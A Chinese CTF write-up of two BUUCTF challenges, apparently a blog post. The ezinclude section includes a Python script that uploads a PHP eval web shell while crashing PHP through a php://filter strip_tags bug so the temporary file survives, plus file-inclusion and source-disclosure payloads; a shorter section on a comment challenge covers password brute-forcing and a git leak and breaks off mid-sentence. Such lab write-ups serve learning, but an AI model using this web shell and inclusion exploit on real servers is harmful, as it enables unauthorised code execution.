[NPUCTF2020]ezinclude

参考：php7 segment fault特性（CVE-2018-14884） - Eddie_Murphy - 博客园 (cnblogs.com)

[BUUCTF题解][NPUCTF2020]ezinclude 1 - Article_kelp - 博客园 (cnblogs.com)

查看源码发现

然后抓包发现一个hash值

然后我直接传参数，让pass等于这一个Hash值

?pass=fa25e54758d5d5c1927781a6ede89f8a

然后我们访问flflflflag.php,网页访问直接就是404，我们在burp访问一下

然后有一个文件包含，我们输入

?file=php://filter/read=convert.base64-encode/resource=index.php

然后没发现啥，看到了过滤了一些东西，然后我们得想办法getshell

然后查了一下可以利用CVE-2018-14884

使用php://filter/string.strip_tags导致php崩溃清空堆栈重启，如果在同时上传了一个文件，那么这个tmp file就会一直留在tmp目录，知道文件名就可以getshell,因为/tmp/xxx,里面的xxx是随机的，需要我们获取才能利用

发现他其实还有一个dir.php,后面用于我们获取文件名。

以下是师傅的脚本

import requests
from io import BytesIO #BytesIO实现了在内存中读写bytes
payload = "<?php eval($_POST[cmd]);?>"
data={'file': BytesIO(payload.encode())}
url="http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
r=requests.post(url=url,files=data,allow_redirects=False)

运行过后，我们再次看一下这个dir.php,发现了多了一个文件

然后蚁剑连接

http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=/tmp/phpFVc8V7

连接上去也没有文件。

然后给脚本里面改一下，直接改成phpinfo,然后查看一下文件名，访问

/flflflflag.php?file=/tmp/phpeEMvZk

[网鼎杯 2018]Comment

参考：[BUUCTF题解][网鼎杯 2018]Comment - Article_kelp - 博客园 (cnblogs.com)

[网鼎杯 2018]Comment题解,超详细！_网鼎杯2018 comment-CSDN博客

[网鼎杯 2018]Comment（二次注入，git泄露，git恢复）_[网鼎杯 2018]comment 1-CSDN博客

随便发了一个评论

提示我们登录，密码是少了三位的，我们burp爆破一下,记得改一下位数

然后爆破出来就是zhangwei666

然后登陆进来没啥东西，然后扫描发现了git泄露

然后我们使用githackerWangYihang/GitHacker: